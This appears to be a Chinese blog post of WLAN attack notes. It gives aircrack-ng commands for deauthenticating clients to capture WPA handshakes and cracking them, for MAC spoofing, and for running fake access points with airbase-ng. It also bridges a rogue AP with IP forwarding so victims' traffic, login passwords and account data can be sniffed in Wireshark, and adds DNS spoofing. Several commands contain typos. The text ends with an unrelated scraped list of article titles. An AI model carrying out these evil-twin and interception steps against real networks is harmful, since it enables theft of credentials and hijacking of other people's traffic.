1、查询连接到无线接入点的情况

使用命令 airodump-ng  wlan0mon  可以看到 有用的信息。我们知道如果有一个客户端使用验证码成功连接到。

顺便查一下其中一个连接的设备的MAC地址的厂商信息 ,

2、使用kali主机攻击无线接入点 。在攻击之前 使用macchange 修改自己的MAC地址,攻击的使用无线接入点的客户端就会掉线,然后会发生重新连接的情况,使用wireshark就可以捕获到握手数据包。

使用攻击的命令   aireplay-ng --deauth 1 -c 自己的MAC地址 -a 无线接入点的Mac地址 wlanmon

查询当前的MAC地址

aireplay-ng --deauth 1 -c 70:f1:1c:0d:dc:4a -a FC:7C:02:3B:FF:63 wlan0mon   但是下图提示AP和kali使用的无线网卡的信道不一样,所以先要修该自己网卡的信道。

                       3、配置静态IP地址

配置静态IP地址的原因有下面几种:

step:   根据特殊的要求当你在一个工作区的时候不想因为网络信号的问题造成DHCP重新配置IP地址。另一个原因是单独的WLAN,使用个手动加入的方式。(这是我翻译的 有点生硬)  

4、查看开启的服务

netstat -antp | grep    

htop  显示进程的

5、开启honey攻击的原理图

开启一个 使用WPA-PSK 的认证模式的接入点  等待羊羔 使用命令 airbase-ng -c 3 -a  06:69:6C:E8:88:98 -e " YaMing" -W 1 -a wlan0mon

同时开启捕获数据包的命令  airodump-ng -c 3 --bssid 06:69:6C:E8:88:98 --write AP-less-WPA-cracking wlan0mon

等到数据包完全捕获之后使用 aircrack-ng 破解

下图是成功捕获到一个连接到伪造的无线接入点的设备

下面是捕获的前两个握手的数据包,因为伪造的数据包并没有与有钱网络连接,不能上网,原理是第5中的第二幅图。

其实真正要破解,还是需要一个比较好的字典库,破解的密码显示如下:

6、如何还用假扮的honeypot wlan来转发上线的客户端

需要设置一个连接honey pot和 和有线网络之间的桥接 保证上线的客户端可以正常的访问网络。

首先创建一个无线热点 使用命令   airbase-ng --essid  ZhongJianRen -c 11 waln0mon

创建一个桥接接口(创建接口的时候必须保证 ) 开启 无线接入点的时候会生成一个MAC地址 如下:

后面的直接写命令。因为我的是 kali linux 上面 没有安装 brctl

搭建桥接:  brctl addr ZhongJianRen-bridge

brtcl addif  ZhongJianRen-bridge eth0

brtcl addif ZHonJianRen at0

ifconfig eth0 0.0.0.0 up

ifconfig at0 0.0.0.0 up

之后使用命令 ifconfig ZhongJianRen-bridge  192.168.0.199 up 给桥接配置一个IP地址 192.168.0.199

最后确保介入客户端的数据流量能够转发 开启转发命令    echo 1>/proc/sys/net/ipv4/ip_forward

发现 没有设置加密之后  已经有客户端直接连接到 honey pot

因为客户端是长时间 连接在自己的honey pot上的,那么流经客户端的所有的流量都是可以使用中间人金子那个控制的。使用 wireshark抓包

使用wireshark可以对一些HTTP服务上的登录或者歇一歇敏感信息分析 包括登录密码信息 账户信息等。前提是这些网站没有使用加密设置。或者使用简单的加密措施,可以被很快的破解掉。么有加密的后果就是 中间拦截后修改重放欺骗。

在上面实验的基础上使用DNS欺骗的手段 ,dnspoof -i ZhongJianRen-bridge   但是没有开启80号端口是不能访问的,开启Apache服务

service apache2 start  之后就可以访问了

7、使用不同的安全认证的方式开启多个无线接入点 honeypot

不适用加密  使用命令 airbase-ng --essid  " you connect" -a  aa:aa:aa:aa:aa:aa -c 3 wlan0mon

使用 WEP安全认证的 airbase-ng --essid "sssd" -a bb:bb:bb:bb:bb -c 4 -W 1  wlan0mon

使用 WPA-PSK 安全认证的 airbase-ng --essid "love" -c 3 -a CC:CC:CC:CC:CC:CC -W 1 -z  2 wlan0mon

使用 WPA2_PSK安全认证的 airbase-ng --essid "test3" -c 3 -a dd:dd:dd:dd:dd:dd -W 1 -Z 2 wlan0mon

一般的手机只支持两种认证机制 分别是 五加密的和使用 WPA-PSK,,另外可以看出,一个无线网卡支持同时开启多个无线接入点

8、企业级的无线网络设备密码破解

企业级的无线网络设备除了大功率之外使用的认证机制也高。但是无线网络实现认证的原理和机制都是一样的。

9、确保信号在无线信号频率  使用频率。   airodump-ng --band bg --cswitch 1 wlan0mon

10、信息检索

站内检索 (域名检索)

文章标题检索   intitle   或者多个 标题检索  使用 allintitle

网址检索   inurl  或者多个网址 检索   allinurl

文件类型查询   filetype:pdf  、  numberrage 1-10  link

                                                                                               

转载于:https://www.cnblogs.com/xinxianquan/p/10185986.html

Advanced Wlan Attacks (RADIUS)相关推荐

  1. 【论文学习】《Who is Real Bob? Adversarial Attacks on Speaker Recognition Systems》

    <Who is Real Bob? Adversarial Attacks on Speaker Recognition Systems>论文学习 文章目录 <Who is Real ...

  2. CCIE重认证--350-401-补充题库-也是必须的哟

    实验 VRRP This is a lab item in which tasks will be performed on virtual devices. Refer to the Tasks t ...

  3. 8104网站端服务器返回错误,Catalyst 9800无线控制器普通的无线客户端连通性问题...

    简介 本文在Catalyst 9800无线控制器描述最普遍的无线客户端连通性问题方案和如何解决他们. Cisco 建议您了解以下主题: Cisco Catalyst 9800 Series无线控制器 ...

  4. https ddos检测——研究现状

    from: https://jyx.jyu.fi/bitstream/handle/123456789/52275/1/URN%3ANBN%3Afi%3Ajyu-201612125051.pdf 相关 ...

  5. FireEye开启IPO大幕

    美国时间2013年8月5日,利用沙箱技术监测APT的领导厂商FireEye向美国证监会提交的S-1表格,开启了IPO的大幕,打算募资1.75亿美元. 根据这份材料显示,fireeye现有900员工,2 ...

  6. 转载:2014 Top Security Tools as Voted by ToolsWatch.org Readers

    2014年十大安全工具排行榜(来自于ToolsWatch.org读者投票) 原文地址:http://www.toolswatch.org/2015/01/2014-top-security-tools ...

  7. billu_b0x靶场通关

    billu靶场通关 靶机ip:192.168.112.134 信息收集 端口开放 80 目录扫描 images目录存在目录遍历 test.php(任意文件下载) add.php(文件上传) index ...

  8. 让WiFi变“4G”?Hotspot2.0来了

    原文链接 http://www.icpcw.com/Smartphone/Android/Android/3188/318832_2.htm WiFi网络在移动设备上的演进过程 接下来,接入点会提供以 ...

  9. AutoFill 自动填充生长动画插件

    AutoFill 是一个简单而强大的插件,能够自动填充图层上原有的像素,透明像素将阻挡填充的进行,从而轻松创建生长动画. 速度贴图 Speed Map是 AutoFill 的关键技术所在,即通过白.灰 ...

最新文章

  1. oracle统计id出现次数,oracle 统计sql
  2. 域 嵌入图像显示不出来_如何(以及为什么)将域概念嵌入代码中
  3. 回溯 皇后 算法笔记_算法笔记-回溯法
  4. 软件工程——快速掌握面向对象开发方法
  5. SpringBoot-拦截器
  6. deploy mysql_Deploy Mysql
  7. sqoop 命令在crontab 不能自定执行
  8. C语言基础知识(期末喽)
  9. paip.输入法编程---词频顺序order by py
  10. mysql+orm+odb_C++ ORM ODB 入门介绍(一)
  11. 使用计算机录制声音10,win10系统电脑中如何解决录屏时无法录制声音的问题
  12. realsense ros 三维点云地面检测与障碍物聚类
  13. Linux查看系统运行时间
  14. win10系统文件拖拽卡顿_windows10鼠标拖动窗口有延迟如何修复
  15. 【2018慢性病与信息大会】周脉耕:信息化助力基层慢病管理
  16. 基于动作捕捉的踝关节动力矫形器外骨骼开发
  17. 【持续更新】数据库常用函数整理
  18. 端到端机器学习”中的“端到端”应如何理解
  19. 三跨),总分420+
  20. 56-20210402华为海思Hi3516DV300的linux系统下读取TF卡(eMMC模式)

热门文章

  1. let声明变量时的特点
  2. 理解Promise的3种姿势
  3. linux下的c语言编程实验4,实验四-Linux下的C语言编程
  4. android 好看的输入法,Android 手机上最好的输入法是哪种
  5. android 文字垂直居中,前端常见问题——安卓文本无法垂直居中
  6. 20200327:最大矩形(leetcode85)
  7. 20200308: 生成每种字符都是奇数个的字符串灯泡开关 III(leetcode5352-5353)
  8. c语言 消除最后一个空格,新人提问:如何将输出时每行最后一个空格删除
  9. linux测试dvi接口,TeX Live DVI字体数据解析整数溢出漏洞
  10. js 取小数整数部分